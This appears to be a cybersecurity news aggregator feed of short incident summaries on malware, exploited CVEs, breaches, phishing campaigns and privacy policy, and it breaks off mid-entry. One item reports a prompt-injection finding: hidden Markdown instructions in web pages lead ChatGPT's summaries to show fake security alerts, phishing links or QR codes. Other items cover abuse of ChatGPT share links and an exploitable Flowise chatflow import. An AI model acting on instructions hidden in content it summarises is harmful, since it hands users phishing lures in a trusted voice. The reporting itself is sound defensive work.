A long-running malware campaign infected about 1,980 WordPress websites and hid its command-and-control data inside Steam Community profile comments. GoDaddy says the malware, tracked since July 2025, uses invisible Unicode characters in Steam comments to encode a payload that builds a hello-mywordl[.]info URL, then injects JavaScript disguised as common libraries and installs a PHP backdoor that executes code sent in specially crafted POST requests with a specific cookie. The initial compromise route is unknown but may involve stolen WordPress or FTP credentials, vulnerable themes or plugins, or a supply-chain compromise.
Why it matters: WordPress site owners and hosting teams should treat this as an active website compromise, not just a nuisance script, because it includes a persistent backdoor that can reinfect a site if cleanup is incomplete. Check for outbound requests to Steam from WordPress servers, suspicious JavaScript injections, and restore from a known-good backup where possible.
Sources
Bill Toulas 2026.06.01 100%
This article establishes a distinct malware campaign centered on WordPress infections that conceal payloads in Steam profile comments, with no matching tracked story covering this same operation.
Full page
Attackers are now exploiting Windows Server Netlogon remote-code-execution flaw CVE-2026-41089
9D ago 2 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareGovernmentMicrosoftCentre for Cybersecurity Belgium
A critical Windows Server security flaw that can let outsiders run code on domain controllers is now being exploited in real attacks. Belgium's Centre for Cybersecurity said CVE-2026-41089, a stack-based buffer overflow in the Netlogon remote procedure call (RPC) service, is under active exploitation after Microsoft patched it in May 2026. The bug affects supported Windows Server versions including Windows Server 2025 and can be triggered by a specially crafted network request without prior authentication.
Why it matters: Domain controllers are the systems that authenticate users across many business networks, so compromise can put an entire organization at risk. Organizations running Windows Server should treat this as high priority and patch exposed and internal domain controllers immediately.
Sources
Ionut Arghire 2026.06.01 98%
This article is the same underlying event: CCB warning that CVE-2026-41089 in Windows Netlogon is being exploited in the wild. It adds detail that Microsoft patched the stack-based buffer overflow on May 12, that exploitation can occur via crafted network requests against domain controllers without authentication, and that Microsoft had not yet updated its advisory to reflect exploitation.
Sergiu Gatlan 2026.06.01 100%
This article establishes a new tracked story by adding the key development that CVE-2026-41089 has moved from a patched critical flaw to one reportedly being exploited in the wild.
Full page
Atlas Menu cheat service breach exposed 64,000 user records after database was posted to GitHub
9D ago 1 sources
Breaches & Data LeaksTechnology & SoftwareMedia & EntertainmentConsumers & General PublicAtlas MenuRockstar GamesValve
Atlas Menu, a cheat service for Grand Theft Auto V and Counter-Strike 2, was breached and data on about 64,000 users was published to GitHub. The leaked database reportedly includes email addresses, usernames, IP addresses, support tickets, signup dates, license keys, Rockstar account identifiers, and passwords stored as bcrypt hashes, along with internal records such as banned-user lists and administrator logs. The attacker claimed access to all Atlas systems.
Why it matters: Affected users face account, privacy, and follow-on phishing risks, especially if they reused passwords elsewhere. Users should reset any reused passwords, watch for scams referencing Atlas or Rockstar accounts, and treat the exposed support and purchase data as potentially sensitive.
Sources
2026.06.01 100%
This article appears to be the first clear report establishing the Atlas Menu breach as a discrete data-leak event with scope, affected data types, and public exposure via GitHub.
Full page
Palo Alto says attackers are exploiting GlobalProtect VPN auth bypass flaw CVE-2026-0257
9D ago 3 sources
Urgent PatchesZero-Days & CVEsPalo Alto NetworksCISA
Palo Alto Networks says attackers are now using a GlobalProtect VPN flaw to try to get into corporate networks without valid credentials. The issue, CVE-2026-0257, affects PAN-OS GlobalProtect portal and gateway configurations that use authentication override cookies with specific certificate reuse; attackers can forge those cookies and establish unauthorized VPN access on unpatched devices. Rapid7 says it saw exploitation from at least May 17, 2026, and CISA has added the flaw to its Known Exploited Vulnerabilities catalog.
Why it matters: Organizations that use Palo Alto GlobalProtect could be exposed to unauthorized remote access into internal networks, so this is an urgent patch-now issue. Defenders should update PAN-OS immediately and, if needed, disable authentication override cookies or use a separate certificate for that feature.
Sources
2026.06.01 98%
This article is the same underlying event and adds specifics that Rapid7 observed successful exploitation in multiple customer environments as early as May 17, saw attackers establish unauthorized VPN sessions, and notes the flaw has been added to CISA's KEV catalog with a federal patch deadline.
Ionut Arghire 2026.06.01 97%
This directly updates the same CVE-2026-0257 event by adding that exploitation began on May 17, four days after disclosure; describing Rapid7's observed waves from Vultr and Dromatics Systems; noting forged-cookie abuse and partial VPN session establishment; and pointing defenders to Rapid7's PoC scanner and indicators of compromise.
Lawrence Abrams 2026.05.30 100%
This article establishes a new tracked event by confirming active exploitation of Palo Alto PAN-OS GlobalProtect CVE-2026-0257 and linking it to urgent mitigation and KEV listing.
Full page
CIFSwitch Linux kernel flaw can let local users gain root on multiple distributions
9D ago 2 sources
Zero-Days & CVEsTechnology & SoftwareConsumers & General Public
A newly disclosed Linux flaw called CIFSwitch can let a normal local user take full control of an affected system. The bug is a local privilege-escalation issue in the Linux kernel CIFS subsystem and cifs-utils, where forged cifs.spnego key requests can make the root-run cifs.upcall helper trust attacker-controlled data and load a malicious NSS module. The researcher says vulnerable combinations affect multiple distributions, published a proof-of-concept exploit, and points to upstream fix commit 3da1fdf.
Why it matters: This matters for multi-user Linux systems and enterprise fleets because a user or attacker who already has limited access may be able to become root. Organizations should identify affected distributions, apply vendor kernel updates, and consider mitigations such as disabling unprivileged user namespaces or removing unused CIFS components.
Sources
Ionut Arghire 2026.06.01 96%
This article is a direct update on the same CIFSwitch Linux kernel privilege-escalation flaw, adding that PoC exploit code has now been released and summarizing affected and non-affected distributions plus the root cause involving the CIFS subsystem and cifs.upcall.
Bill Toulas 2026.05.30 100%
This article appears to establish a new tracked event: the public disclosure of the CIFSwitch Linux privilege-escalation flaw, including affected distributions, mitigation guidance, and a released proof-of-concept.
Full page
UK moves to tighten subsea cable protections after reporting Russian survey activity near British undersea internet infrastructure
9D ago 1 sources
Information FreedomPolicy & RegulationGovernmentDefense & AerospaceTelecommunicationsUK governmentRoyal NavyGUGI
The UK says Russian vessels and submarines recently surveyed cable routes near Britain, and the government is preparing stronger legal protections for undersea internet cables. The reported April activity involved a Russian Akula-class submarine and two specialist GUGI deep-sea research vessels, according to the minister's speech. Proposed measures include tougher penalties for reckless cable damage, new security duties for cable operators, and emergency powers allowing the government to compel stronger infrastructure protection.
Why it matters: Subsea cables carry much of the UK's internet and international communications, so interference could disrupt connectivity and critical services. This matters to telecom operators, infrastructure owners, and policymakers because it signals a live hybrid-threat risk and points to forthcoming compliance and resilience requirements.
Sources
2026.06.01 100%
This article establishes a distinct story about suspected Russian reconnaissance of UK subsea communications infrastructure and the UK's resulting legal and operational push to protect cable networks.
Full page
Kaspersky says previously unknown hacking group spent nearly two years phishing Russian maritime universities, diplomats and energy organizations
9D ago 1 sources
Threat Actors & APTsSocial Engineering & PhishingEducationGovernmentEnergy & UtilitiesFinance & BankingTransportation & Logistics
A previously unknown hacking group quietly targeted Russian maritime schools, diplomatic missions, energy facilities, government agencies and financial institutions for nearly two years. Kaspersky says the campaign dates back to at least 2024 and used phishing emails with ZIP attachments containing a malicious file disguised as a Microsoft Excel configuration file; recent attacks starting in January 2026 used the Ravage post-compromise framework from GitHub to run commands, move files and capture screenshots. The company did not name the group, provide victim totals, or attribute the activity to a known state or criminal actor.
Why it matters: This is a sustained espionage-style campaign against sensitive Russian sectors, showing that simple phishing attachments are still effective and that publicly available offensive tools are being folded into real operations. Organizations in similar sectors should review email defenses, hunt for Ravage-related activity, and investigate suspicious Excel-launched processes and dormant compromises.
Sources
2026.05.31 100%
This article appears to be the first tracked report establishing this specific, previously unreported multi-year campaign and its targeting pattern.
Full page
Suspected Pakistan-linked SideCopy phishing campaign targets Afghanistan finance officials with XenoRAT malware
9D ago 1 sources
Threat Actors & APTsSocial Engineering & PhishingMalwareGovernmentFinance & BankingAfghan Ministry of Finance
Afghan Ministry of Finance and provincial government officials were targeted in a phishing campaign that installed remote-access malware on victims' computers. Seqrite attributed the activity with medium-to-high confidence to the Pakistan-linked SideCopy group, which used Pashto-language lure documents inside ZIP archives and delivered them through compromised Afghan government server infrastructure; opening the file installed XenoRAT, a remote access trojan, which then contacted attacker-controlled servers in Europe.
Why it matters: This matters because it shows a suspected state-linked espionage operation aimed at government financial and provincial officials, using trusted local-language lures and compromised government infrastructure to improve success. Afghan public-sector defenders should investigate suspicious ZIP attachments, review access to government-hosted domains, and hunt for XenoRAT-related activity.
Sources
2026.05.31 100%
This article establishes a distinct campaign: a newly reported suspected SideCopy operation targeting Afghan finance-sector government entities via Pashto-language phishing and XenoRAT.
Full page
European intelligence officials warn Russia is intensifying espionage and cyber intrusions to steal sanctioned Western technology
11D ago 1 sources
Threat Actors & APTsPolicy & RegulationGovernmentDefense & AerospaceEnergy & UtilitiesTechnology & SoftwareManufacturing
European intelligence officials say Russia is increasingly using fake companies, middlemen, and cyber operations to steal Western technology, defense know-how, and software restricted by sanctions. The reported targets include defense research, dual-use camera and laser technology, machine-tool software updates, and critical infrastructure reconnaissance in Sweden, Finland, and the U.K. Officials also said Russia-linked actors attempted a destructive intrusion against a Swedish power plant last year but were detected before causing damage.
Why it matters: This matters to companies in defense, manufacturing, research, and critical infrastructure because they may be targeted both for theft and for pre-attack reconnaissance. Organizations should scrutinize customers and intermediaries for sanctions evasion, harden networks used for industrial systems, and watch for state-linked phishing, intrusion, and supply-chain targeting.
Sources
Associated Press 2026.05.30 100%
This article establishes a distinct story by tying sanctions pressure to a broader, ongoing Russian espionage and cyber campaign against Western technology suppliers and infrastructure, rather than reporting on a single previously tracked breach or malware incident.
Full page
Exploit code published for Flowise remote-code-execution flaw CVE-2026-40933 affecting self-hosted servers
11D ago 1 sources
Zero-Days & CVEsTechnology & SoftwareFlowise
Public exploit code is now available for a critical Flowise bug that can let attackers take over self-hosted AI workflow servers by getting someone to import a malicious chatflow. The flaw, CVE-2026-40933 (CVSS 9.9), affects Flowise before 3.1.0 and stems from unsafe handling of Anthropic Model Context Protocol (MCP) stdio commands in the MCP adapter. Importing a crafted chatflow can trigger command execution during tool enumeration, leading to operating-system-level code execution with the Flowise process's privileges. Flowise Cloud is not affected because stdio MCP is disabled there.
Why it matters: Organizations running self-hosted Flowise should treat this as urgent because working exploit code lowers the barrier to real attacks and the flaw can expose stored credentials and connected services. Update to 3.1.0 or later and limit who can create or import chatflows, especially where Flowise is connected to databases, APIs, or cloud accounts.
Sources
Ionut Arghire 2026.05.30 100%
This article establishes a distinct escalation in the Flowise CVE-2026-40933 story by reporting that technical details and proof-of-concept code have been published, making the exploit path concrete and actionable for defenders.
Full page
Microsoft says 14 malicious npm packages impersonated OpenSearch and Elasticsearch libraries to steal cloud and CI/CD credentials
12D ago 1 sources
Supply ChainMalwareTechnology & SoftwareOpenSearchElasticsearchGitHubHashiCorpnpm
A single attacker published 14 malicious npm packages that pretended to be OpenSearch, Elasticsearch, and related developer tools, putting developers and build systems at risk of secret theft. Microsoft said the packages were uploaded under the alias "vpmdhaj" and used typosquatting, spoofed metadata, and inflated version numbers; on install, preinstall hooks fetched a second-stage credential harvester targeting Amazon Web Services, HashiCorp Vault, GitHub Actions, and npm tokens. The packages were removed after publication.
Why it matters: Anyone who installed or built these packages may have exposed credentials that can be reused to access cloud accounts, code pipelines, and package publishing systems. Organizations should identify affected installs from May 28 onward, rotate AWS Identity and Access Management or Security Token Service credentials, Vault tokens, npm publish tokens, and GitHub Actions secrets, and review for follow-on compromise.
Sources
2026.05.29 100%
This article establishes a distinct npm package supply-chain incident centered on 14 typosquatted packages targeting OpenSearch and Elasticsearch users, not one of the existing tracked package compromises.
Full page
California AB 1856 advances with open-source exemption but would expand age-check requirements to browsers and websites
12D ago 1 sources
Surveillance & PrivacyPolicy & RegulationInformation FreedomCensorshipGovernmentTechnology & SoftwareConsumers & General Public
California lawmakers advanced AB 1856, a bill that would exempt open-source operating systems from parts of the state's age-assurance law but broaden age-checking requirements for many internet services. EFF says the amended bill would still extend the age-bracketing regime created by AB 1043 beyond operating systems and app stores to web browsers and websites, increasing pressure to collect users' age data and potentially affecting anonymity, privacy, and access to lawful speech.
Why it matters: If enacted, the bill could force more online services to ask for and retain age information, creating new privacy and security risks for ordinary users while raising compliance burdens for developers and platforms. People and organizations tracking internet freedom and privacy policy should watch the Senate process closely.
Sources
Molly Buckley 2026.05.29 100%
This article establishes a distinct California policy story centered on AB 1856's legislative advance, its new open-source exemption, and its simultaneous expansion of age-gating obligations to browsers and websites.
Full page
ICE awards Bi2 Technologies $25.1 million contract for 1,570 biometric scanners linked to iris, fingerprint, face, and law-enforcement databases
12D ago 1 sources
Surveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareConsumers & General PublicICEBi2 Technologies
U.S. Immigration and Customs Enforcement is expanding field use of biometric scanners that can identify people by iris scans, fingerprints, and facial recognition. Contract records show ICE awarded Bi2 Technologies about $25.1 million for 1,570 mobile and stationary devices and access to Bi2's IRIS system, which searches more than five million booking, arrest, and incarceration records across 47 states, along with driver’s license and license-plate data; the deal follows a smaller 200-device deployment under a 2025 contract.
Why it matters: This matters to immigrants, protesters, and the public because it expands real-world government biometric surveillance at scale, with risks of misidentification, bias, and wider tracking. The concrete implication is policy and oversight scrutiny rather than patching: civil-liberties groups, lawmakers, and affected communities should watch how ICE uses the devices and what databases they query.
Sources
2026.05.29 100%
The article establishes a specific new procurement and deployment event: ICE's large-scale purchase of Bi2 biometric devices and database access, distinct from the existing tracked items about other surveillance programs or court cases.
Full page
Attackers abuse ChatGPT share links and Google ads to deliver malware through fake OpenAI outage pages
12D ago 1 sources
MalwareSocial Engineering & PhishingTechnology & SoftwareConsumers & General PublicOpenAIGoogle
Attackers are using legitimate ChatGPT share links to show fake OpenAI outage notices that tell people to download a bogus ChatGPT desktop app. Push Security says the LLMShare campaign buys Google ads for ChatGPT searches, serves the lure from chatgpt.com/s/ pages rendered with custom HTML and CSS inside ChatGPT, then redirects victims to openew[.]app, which offers cloaked Windows and macOS malware downloads; the Windows sample checks whether it is running on a real device or a virtual machine.
Why it matters: This matters because the scam is hosted partly on a real OpenAI domain, making it more convincing to ordinary users and harder for defenders to spot. Users should avoid sponsored results for AI tools, download apps only from the official vendor site or app store, and security teams should monitor for chatgpt.com share-link abuse and block the impersonation domain.
Sources
Lawrence Abrams 2026.05.29 100%
This article establishes a distinct campaign centered on abuse of ChatGPT's share-link feature and Google ads to distribute malware via fake outage pages, not the same underlying event as any tracked story.
Full page
California sues 23andMe over the 2023 breach that exposed genetic and profile data of nearly 7 million people
12D ago 3 sources
Policy & RegulationSurveillance & PrivacyBreaches & Data LeaksHealthcareConsumers & General Public23andMeCalifornia Attorney General
California has sued 23andMe, now operating as Chrome Holding Co., alleging the company failed to adequately protect customers’ genetic and account data in the 2023 breach affecting nearly 7 million people. The complaint says attackers used credential stuffing—trying usernames and passwords stolen elsewhere—to access about 14,000 accounts, then scrape broader data through 23andMe’s DNA Relatives features; the state also alleges 23andMe failed to require stronger safeguards such as multifactor authentication, missed warning signs for months, and only acted after stolen data was advertised for sale and ransom demands were made.
Why it matters: This matters because the stolen information included highly sensitive genetic and health-related data, and the lawsuit may shape how companies are expected to protect and handle biometric and genomic records. Affected users should reset reused passwords, enable multifactor authentication where available, and review what personal and relative-sharing data remains in their account.
Sources
Bill Toulas 2026.05.29 98%
This is the same underlying event: California's lawsuit over the 2023 23andMe breach. The article adds details on the complaint's allegations, including failure to defend against credential stuffing, missed intrusion-detection opportunities, a DNA Relatives coding error, and claims that 23andMe misled users before and after the breach.
2026.05.29 98%
This article is the same underlying event: California's lawsuit over 23andMe's 2023 breach. It adds that the suit is now directed at Chrome Holding Co., the post-sale successor to 23andMe, and emphasizes allegations that the company downplayed the breach, failed to implement basic safeguards such as stronger MFA adoption, detected the intrusion only after months, and paid a ransom to the attacker.
Associated Press 2026.05.29 100%
This article establishes a trackable new story because it is not just a recap of the 2023 23andMe breach; it is a concrete state legal action alleging specific security failures, privacy-law violations, and mishandling of genetic data tied to that breach.
Full page
Unsealed court records show DOJ tried and failed to get Don Lemon and Georgia Fort YouTube account data
12D ago 2 sources
Information FreedomSurveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareMedia & EntertainmentDOJYouTube
A federal judge twice rejected prosecutors’ attempts to obtain YouTube account records tied to journalists Don Lemon and Georgia Fort, including information about their channels and possible viewers. The warrants were sought in a criminal case related to the journalists’ coverage of a protest at a church in St. Paul, Minnesota. Court records show the judge found the applications lacked probable cause and did not comply with the Privacy Protection Act of 1980, which generally limits search warrants targeting journalists and publishers.
Why it matters: This matters to journalists, sources, and viewers because prosecutors sought not just reporter account data but potentially audience information as well. It is a significant press-freedom and privacy issue, and it adds urgency to scrutiny of DOJ warrant practices and proposed updates to journalist-protection laws.
Sources
Freedom of the Press Foundation 2026.05.29 94%
This newsletter directly references the same newly unsealed court records and adds framing from Freedom of the Press Foundation that the rejected warrant applications targeted journalists Don Lemon and Georgia Fort over protest coverage.
Freedom of the Press Foundation 2026.05.27 100%
This article establishes a distinct new story because it is based on newly unsealed warrant records revealing a specific failed DOJ effort to compel YouTube data from named journalists and their audiences.
Full page
Trump Mobile website reportedly exposed customer records through an unsecured API request
12D ago 2 sources
Breaches & Data LeaksSurveillance & PrivacyTelecommunicationsConsumers & General PublicTrump Mobile
A Trump Mobile website flaw reportedly let anyone pull customer order records, exposing personal details of people who preordered the company’s phone service and handset. According to The Register and the finder, a simple HTTP POST request to exposed application programming interface (API) endpoints returned batches of records containing names, postal addresses, email addresses, phone numbers, customer numbers, enrollment IDs, and order-channel details; no CVE is assigned, and the issue was reportedly fixed after disclosure attempts.
Why it matters: Affected customers could face phishing, impersonation, or account-targeted fraud if their contact and order data was exposed. Trump Mobile users should watch for suspicious calls, texts, and emails referencing orders or account setup, while the company should clarify scope and notify affected users if exposure is confirmed.
Sources
SecurityWeek News 2026.05.29 95%
This article adds that Trump Mobile confirmed customer names, addresses, email addresses, phone numbers, and other data were exposed, and said a third-party platform provider was responsible for the exposure.
2026.05.22 100%
This article appears to be the first concrete report of the Trump Mobile customer-data exposure event, including the claimed technical access method, categories of data exposed, and estimated scale.
Full page
Charter confirms breach after ShinyHunters claims it stole customer data through a vishing attack
12D ago 4 sources
Social Engineering & PhishingBreaches & Data LeaksScams & FraudThreat Actors & APTsTelecommunicationsTechnology & SoftwareConsumers & General PublicCharter CommunicationsMicrosoftSalesforce
Charter Communications says it suffered a security incident after the ShinyHunters extortion group threatened to leak stolen data. The attackers claim they breached Charter on April 1 by using voice phishing (vishing) to compromise an employee's Microsoft Entra account, then used access to Charter's Salesforce environment to export about 40 million customer records, including names, contact details, plan information, support tickets, and some customer proprietary network information (CPNI); Charter disputes that sensitive personal data or CPNI was exfiltrated.
Why it matters: Charter serves tens of millions of customers, so even partial account and service data exposure could create follow-on phishing, fraud, and impersonation risks. Affected users should watch for targeted calls and emails referencing Spectrum or account details, while defenders should review identity-provider protections, help-desk verification, and Salesforce access logs.
Sources
Ionut Arghire 2026.05.29 98%
This is the same Charter/ShinyHunters breach event and adds that the gang has now published the allegedly stolen data, that Have I Been Pwned found about 4.9 million unique email addresses in the leak, and that the dataset includes names, addresses, phone numbers, and roughly 85,000 employee-linked records. It also includes Charter's statement disputing that CPNI or sensitive personal information was released.
2026.05.29 98%
This is the same Charter/ShinyHunters breach event and updates it with reported public leakage of 4.9 million customer records, Have I Been Pwned ingestion details, and Charter's statement that no sensitive PI or CPNI was exfiltrated.
Sergiu Gatlan 2026.05.29 98%
This is the same underlying Charter/ShinyHunters incident and adds key specifics: Have I Been Pwned says 4.9 million unique accounts were affected, the leaked data included names, email addresses, phone numbers, physical addresses, and about 85,000 employee-directory records with job titles, and the intrusion reportedly began with a vishing attack against an employee's Microsoft Entra account followed by theft from Salesforce.
Lawrence Abrams 2026.05.26 100%
This article appears to be the first tracked item establishing Charter's confirmed breach tied to a ShinyHunters extortion claim and a specific vishing-to-SaaS compromise path.
Full page
Google rolls out Chrome device-bound session protection to block stolen cookie account hijacking
12D ago 1 sources
Surveillance & PrivacyTechnology & SoftwareConsumers & General PublicGoogle
Google says Chrome's Device Bound Session Credentials feature is now rolling out broadly for personal Google accounts and Google Workspace users to stop attackers from reusing stolen login cookies. The protection cryptographically binds session cookies to a specific device using hardware-backed keys such as TPM on Windows and Secure Enclave on macOS, making stolen cookies far harder to use for account takeover even after multi-factor authentication. Google says it will be enabled by default for Workspace customers and cannot be turned off by admins.
Why it matters: This matters to anyone using Google accounts because session-cookie theft is a common way infostealer malware and phishing campaigns bypass login protections. Users should still remove malware and harden browsers, but this rollout adds an important default defense against account hijacking.
Sources
Sergiu Gatlan 2026.05.29 100%
The article establishes a new trackable security development: Google's general-availability rollout of Chrome Device Bound Session Credentials as a concrete mitigation against session-cookie theft and account takeover.
Full page
Researcher says ChatGPT web-page summaries can be prompt-injected to show phishing links and fake security alerts
12D ago 1 sources
Social Engineering & PhishingTechnology & SoftwareConsumers & General PublicOpenAI
A researcher says ChatGPT can be tricked into turning a malicious web page into a phishing message when a user asks it to summarize that page. Permiso's Andi Ahmeti reported that hidden Markdown instructions in attacker-controlled content can make ChatGPT include fake account alerts, attacker links, or QR codes in its response; OpenAI did not confirm a fix, and no CVE is cited in the report.
Why it matters: People using ChatGPT to summarize websites could be shown convincing phishing prompts in the assistant's own voice, including links or QR codes that bypass normal browser safety habits. Until OpenAI confirms a fix, users and defenders should treat AI-generated summaries of untrusted pages as potentially tainted and avoid clicking embedded links or scanning QR codes.
Sources
2026.05.29 100%
This article appears to be the initial report of a distinct ChatGPT prompt-injection phishing technique affecting browser-rendered external content, and it does not match any existing tracked story.
Full page
WithSecure links new Russia-aligned GreyVibe campaign to phishing and malware attacks on Ukrainian targets
12D ago 3 sources
Threat Actors & APTsSocial Engineering & PhishingMalwareGovernmentDefense & AerospaceConsumers & General Public
Researchers say a previously undocumented Russia-linked group called GreyVibe has targeted Ukrainian military, government, civilian, and business organizations since August 2025. WithSecure says the actor used at least six spear-phishing campaigns, fake adult-club websites, Telegram and dating-site lures, and file-sharing links to deliver PhantomRelay and LegionRelay malware on Windows and Fallspy on Android; the report also says the group used ChatGPT, Gemini, Ideogram, and other generative artificial intelligence tools across lure creation, malware development, obfuscation, and post-compromise tooling.
Why it matters: This matters because it describes an active espionage-focused campaign against Ukrainian targets and shows how lower-sophistication operators can use generative artificial intelligence to scale convincing phishing and malware operations. Organizations supporting Ukraine should review indicators, harden email and mobile defenses, and warn users about archive-based lures, fake personas, and links delivered over chat and dating platforms.
Sources
2026.05.29 97%
This article is a direct write-up of the same GREYVIBE campaign, adding detail that the operators used ChatGPT, Gemini, and Ideogram AI across lure creation, malware development, infrastructure setup, obfuscation, and post-compromise work, and noting OPSEC mistakes and design flaws in LegionRelay that exposed backend infrastructure.
Bill Toulas 2026.05.28 98%
This article is a direct update on the same GreyVibe campaign, adding detail that the group used ChatGPT, Gemini, and other AI tools to generate lures and likely assist development of custom obfuscators and malware including LegionRelay, PhantomRelay, and FallSpy, alongside more specifics on attack chains such as PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo.
Kevin Townsend 2026.05.28 100%
This article appears to be the first tracked item here establishing GreyVibe as a distinct Russia-linked campaign and naming its malware families, targeting, and AI-assisted operating methods.
Full page
U.S. man sentenced for selling personal data of 7 million elderly Americans to Jamaican lottery scammers
12D ago 1 sources
Scams & FraudBreaches & Data LeaksConsumers & General Public
A North Carolina man was sentenced to prison for selling elderly Americans' personal information to scammers who used it in lottery fraud schemes. Troy Murray pleaded guilty to conspiracy to commit wire fraud and was sentenced to 121 months after prosecutors said he sold at least 22,000 lead lists between 2016 and 2023 containing names, phone numbers, physical addresses, and email addresses of over 7 million seniors; authorities said the scheme generated more than $5.2 million for him and caused over $9.5 million in victim losses.
Why it matters: This matters because it shows how stolen or traded personal data directly fuels large-scale fraud against older adults. People, especially seniors and their families, should be wary of unsolicited calls or messages about prizes or lotteries, and defenders and policymakers can use the case as a concrete indicator of fraud infrastructure and data-broker abuse.
Sources
Sergiu Gatlan 2026.05.29 100%
This article establishes a distinct law-enforcement milestone in a large elder-fraud operation centered on the sale of lead lists to Jamaican lottery scammers, and it does not match any existing tracked story by the same underlying event.
Full page
Google Chrome 148 update fixes 151 browser vulnerabilities, including 22 critical flaws
12D ago 1 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicGoogle
Google released a Chrome 148 security update that fixes 151 vulnerabilities, including 22 critical bugs that could help attackers run malicious code through the browser. The most severe issues named are CVE-2026-9872 (out-of-bounds write in GPU), CVE-2026-9873 (use-after-free in Network), CVE-2026-9874 (use-after-free in Dawn), CVE-2026-9875 (out-of-bounds read in WebGL), and CVE-2026-9876 (use-after-free in WebGL). The update is rolling out as 148.0.7778.216/217 for Windows, 148.0.7778.215/216 for macOS, and 148.0.7778.215 for Linux.
Why it matters: Chrome is widely used, so browser flaws with remote-code-execution potential can expose large numbers of people and organizations to drive-by compromise if left unpatched. Users and IT teams should update Chrome promptly across Windows, macOS, and Linux fleets.
Sources
Ionut Arghire 2026.05.29 100%
This article establishes a distinct patch-cycle story centered on Google's Chrome 148 update and the specific set of newly disclosed CVEs it fixes; no existing tracked story covers this same release.
Full page
Pentagon confirms foreign adversaries used commercial smartphone location data to target U.S. troops in the Middle East
13D ago 1 sources
Surveillance & PrivacyPolicy & RegulationGovernmentDefense & AerospaceTechnology & SoftwareConsumers & General PublicPentagonDepartment of DefenseU.S. Central Command
The Pentagon says foreign adversaries used commercially available phone-location data to target or surveil U.S. military personnel in active war zones, affecting troops who carried personal or government-issued smartphones. According to DoD responses released by Sen. Ron Wyden, U.S. Central Command received multiple threat reports tied to commercial data-broker purchases sourced from mobile advertising profiles and device ad identifiers; the department said existing guidance to disable geolocation was incomplete, and some DoD-managed phones still allowed ad-targeting data to be exposed.
Why it matters: This is a real-world national security and personal safety risk, not a theoretical privacy problem: location data sold by brokers can expose troop movements and bases. It raises urgency for stricter mobile-device controls, disabling ad IDs and location sharing, and rethinking bring-your-own-device policies in sensitive environments.
Sources
2026.05.28 100%
This article appears to be the first public confirmation, backed by DoD responses to lawmakers, that adversaries exploited commercial geolocation data to target or monitor U.S. troops in theater.
Full page
ESET warns BTMOB Android malware sold as a kit can steal data and remotely control infected phones
13D ago 2 sources
MalwareScams & FraudSocial Engineering & PhishingConsumers & General Public
A newly highlighted Android malware family called BTMOB can give criminals broad control over infected phones, including stealing data and taking over the device. ESET says the remote access trojan (RAT) is spread through phishing pages and fake app stores, abuses Android Accessibility Services to gain elevated privileges, and is sold with an APK-building kit that lets buyers customize lures by country and brand. The campaign has mainly been observed in Latin America.
Why it matters: This is more serious than a typical banking trojan because it can turn an Android phone into a remotely controlled spying and theft tool. Android users should avoid app downloads from links in messages or fake stores, and defenders should watch for phishing infrastructure and abuse of Accessibility permissions.
Sources
Bill Toulas 2026.05.28 97%
This is the same underlying ESET-reported BTMOB Android malware story, adding detail that the service includes a builder for custom phishing-themed payloads, is sold via Telegram with subscription pricing, is distributed through fake Google Play pages, and is concentrated in Brazil and Latin America.
Ionut Arghire 2026.05.28 100%
This article appears to be the initial broad reporting on ESET's identification of BTMOB as a distinct Android malware threat sold as a customizable kit and delivered through phishing lures.
Full page
Attackers use FortiClient EMS zero-day CVE-2026-35616 to push infostealer malware to managed devices
13D ago 4 sources
Zero-Days & CVEsUrgent PatchesMalwareTechnology & SoftwareFortinet
Attackers are using a critical Fortinet server flaw to send malware to computers managed by FortiClient Endpoint Management Server (EMS). The issue, CVE-2026-35616, is a remote code execution bug in FortiClient EMS that can be exploited without authentication via crafted requests; Fortinet patched it in April after warning it had already been used as a zero-day, and Arctic Wolf now says fresh attacks are abusing EMS scripting workflows to deploy EKZ Infostealer disguised as a Fortinet patch.
Why it matters: This can turn a central management server into a way to infect every device it manages, putting passwords, browser cookies, and other sensitive data at risk. Organizations running FortiClient EMS should patch immediately, check for suspicious PowerShell/script activity, and investigate whether fake update jobs were pushed to endpoints.
Sources
Bill Toulas 2026.05.28 99%
This article is the same underlying event and adds specific tradecraft from Arctic Wolf: attackers abused FortiClient EMS endpoint APIs and VPN scripting workflows to deliver the EKZ infostealer, used fortitray.exe and PowerShell to fetch a fake Fortinet update, and left detectable log artifacts such as 'Certificate not found in request header.'
Ionut Arghire 2026.05.28 100%
This article establishes a distinct story by adding concrete post-patch exploitation details for FortiClient EMS CVE-2026-35616, including the malware payload, delivery method through EMS-managed VPN scripting, and the risk of compromise spreading to all managed endpoints.
Arctic Wolf Labs 2026.05.27 97%
This source directly updates the same event by naming the payload as EKZ Infostealer, describing how it was disguised as a Fortinet patch, explaining abuse of EMS policy and remote access profile changes to run malicious PowerShell across managed endpoints, and providing detection details including EMS log artifacts and Tor-linked follow-on activity.
Arctic Wolf Labs 2026.05.27 99%
This directly updates the same event by adding victim-observed tradecraft: attackers exploited CVE-2026-35616 in FortiClient EMS, modified EMS configuration, and delivered a fake Fortinet patch that installed the EKZ Infostealer on managed endpoints via PowerShell. It also adds detection clues from EMS logs and notes follow-on activity from Tor exit nodes.
Full page
Carnival confirms ShinyHunters-linked data breach affecting nearly 6 million cruise customers
13D ago 4 sources
Threat Actors & APTsSocial Engineering & PhishingBreaches & Data LeaksHospitality & TravelConsumers & General PublicCarnivalHolland America
Carnival Corporation says attackers stole customer data after socially engineering an employee and accessing part of its IT systems, affecting 5,995,277 people. The company says the intrusion was identified on April 14, 2026 and data theft was confirmed on April 22; ShinyHunters had claimed the breach in April and said it stole millions of records. Exposed data reportedly includes names, dates of birth, email addresses, gender, location, and loyalty-program details tied to Holland America's Mariner Society.
Why it matters: This is a major consumer data breach involving sensitive personal information that could fuel phishing, impersonation, and account-targeting scams. Affected customers should watch for breach notices, be cautious of unsolicited calls or emails referencing cruises or loyalty programs, and change passwords anywhere they were reused.
Sources
Ionut Arghire 2026.05.28 99%
This is the same underlying Carnival breach: it adds the formal disclosure that 5,995,277 people were affected, says the intrusion was identified April 14 after social engineering compromised an employee account, and specifies categories of stolen personal data and the company's notification and credit-monitoring response.
2026.05.28 99%
